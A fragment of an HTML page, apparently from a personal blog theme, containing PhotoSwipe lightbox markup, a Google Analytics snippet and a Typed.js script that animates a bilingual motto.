         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>



    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="//www.googletagmanager.com/gtag/js?id=UA-149874671-1"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-149874671-1');
    </script>





<script>
    function initialTyped () {
        var typedTextEl = $('.typed-text');
        if (typedTextEl && typedTextEl.length > 0) {
            var typed = new Typed('.typed-text', {
                strings: ["Think like an artist, develop like an artisan", "艺术家思维去思考问题，工匠创造精神去开发"],
                typeSpeed: 90,
                loop: true,
                loopCount: Infinity,
                backSpeed: 20,
            });
        }
    }

    if ($('.article-header') && $('.article-header').length) {
        $(document).ready(function () {
            initialTyped();
        });
    }
</script>




</html>
